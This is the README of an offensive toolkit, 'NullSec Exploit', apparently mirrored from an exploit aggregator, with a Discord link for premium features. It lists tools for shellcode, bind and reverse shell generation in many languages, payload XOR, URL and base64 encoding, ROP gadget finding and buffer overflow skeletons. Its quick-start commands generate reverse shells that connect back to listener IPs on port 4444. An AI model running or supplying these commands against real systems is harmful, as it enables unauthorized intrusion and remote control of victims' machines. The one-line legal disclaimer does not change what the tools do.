Share
## https://sploitus.com/exploit?id=794D628D-AAFB-5D1F-A016-5E1ECD6730F3
# ๐ NullSec Exploit
### Advanced Exploit Development & Payload Generation
[](https://discord.gg/killers)
[](https://github.com/bad-antics)
[](LICENSE)
```
โโโโโโโ โโโโโโ โโโ โโโโโโ โโโโโโ โโโ โโโ โโโโโโ โโโ โโโโโโ โโโโโโโโโโโโ
โโโโ โโโโโโ โ โโโโโโโโโโโ โโโ โโ โ โโ โ โ โโโโโโ โโโโโโโ โโโโ โโโโโโโโ โโโ โโ
โโโ โโโโโ โโโ โโโโโโโโโ โโโโ โโโโ โโ โ โโโโโ โโโโโโโโ โโโโ โโโโโโโโ โโโโ โโ
โโโโ โโโโโโโโ โโโโโโโโโโโ โ โโโ โ โ โ โ โ โโโโโโโ โโโโโ โโโ โโโโโโโโ โโโโ โ
โโโโโโโ โโโโ โโโโโโโโโโโโ โ โ โโโโโโโโโโโ โโโโโโโโ โ โโโโโโโโโโ โโโโโโโโโโโ โโโโ โ
โโโ โ โ โโ โโโโโโ โโโโ โ โ โโ โโ โโโ โ โโ โโโโโ โ โโ โโโ โโ โโโโโโ โโ โ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ SHELLCODE โโโ PAYLOADS โโโ ROP CHAINS โโโ ENCODERS โโโ REVERSE SHELLS โโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
bad-antics
```
### ๐ **[Join discord.gg/killers](https://discord.gg/killers)** for premium features!
---
## ๐ฏ Features
| Tool | Language | Description | Free | Premium |
|------|----------|-------------|------|---------|
| **shellgen** | Python | Shellcode generator | โ
| ๐ฅ |
| **payloader** | Python | Multi-platform payloads | โ
| ๐ฅ |
| **ropfinder** | C | ROP gadget finder | โ | ๐ฅ |
| **encoder** | Python | Payload encoding/obfuscation | โ
| ๐ฅ |
| **revshell** | Python | Reverse shell generator | โ
| ๐ฅ |
| **bofgen** | C | Buffer overflow skeleton | โ | ๐ฅ |
---
## ๐ Structure
```
nullsec-exploit/
โโโ c/
โ โโโ ropfinder/ # ROP gadget finder
โ โโโ bofgen/ # BOF exploit generator
โ โโโ shellcode/ # Raw shellcode templates
โโโ python/
โ โโโ shellgen.py # Shellcode generator
โ โโโ payloader.py # Payload generator
โ โโโ encoder.py # Encoding utilities
โ โโโ revshell.py # Reverse shell gen
โโโ asm/
โ โโโ linux_x64/ # Linux x64 shellcode
โ โโโ linux_x86/ # Linux x86 shellcode
โ โโโ windows_x64/ # Windows x64 shellcode
โ โโโ windows_x86/ # Windows x86 shellcode
โโโ templates/
โโโ exploits/ # Exploit templates
โโโ payloads/ # Payload templates
```
---
## ๐ง Shellcode Types
### Linux
| Type | x86 | x64 | Description |
|------|-----|-----|-------------|
| exec | โ
| โ
| Execute command |
| bind | โ
| โ
| Bind shell |
| reverse | โ
| โ
| Reverse shell |
| meterpreter | โ | โ
| Meterpreter stage |
### Windows
| Type | x86 | x64 | Description |
|------|-----|-----|-------------|
| exec | โ
| โ
| Execute command |
| bind | โ
| โ
| Bind shell |
| reverse | โ
| โ
| Reverse TCP |
| messagebox | โ
| โ
| MessageBox PoC |
---
## ๐ Quick Start
```bash
# Generate reverse shell shellcode
python3 shellgen.py -t reverse -l 192.168.1.100 -p 4444 -a x64 -o linux
# Generate encoded payload
python3 encoder.py -i shellcode.bin -e xor -k 0x41 -o encoded.bin
# Generate one-liner reverse shells
python3 revshell.py -l 192.168.1.100 -p 4444 --all
# Find ROP gadgets
./ropfinder -f /lib/x86_64-linux-gnu/libc.so.6 -o gadgets.txt
```
---
## ๐ง Tool Details
### shellgen.py - Shellcode Generator
```bash
# Linux x64 reverse shell
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 -a x64 -o linux
# Windows x86 bind shell
python3 shellgen.py -t bind -p 4444 -a x86 -o windows
# With encoding
python3 shellgen.py -t exec -c "id" -a x64 -o linux -e xor
# Output formats
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 --format c
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 --format python
python3 shellgen.py -t reverse -l 10.0.0.1 -p 4444 --format raw
```
### revshell.py - Reverse Shell Generator
Supports:
- Bash
- Python
- PHP
- Perl
- Ruby
- Netcat
- PowerShell
- Java
- Groovy
```bash
# Generate all reverse shells
python3 revshell.py -l 10.0.0.1 -p 4444 --all
# Specific language
python3 revshell.py -l 10.0.0.1 -p 4444 -t python
# URL encoded (for web)
python3 revshell.py -l 10.0.0.1 -p 4444 -t bash --urlencode
# Base64 encoded
python3 revshell.py -l 10.0.0.1 -p 4444 -t powershell --base64
```
---
## โ ๏ธ Legal Disclaimer
**For authorized security testing only.** Creating and using exploits without authorization is illegal.
---
**NullSec Framework** | [GitHub](https://github.com/bad-antics) | [Discord](https://discord.gg/killers)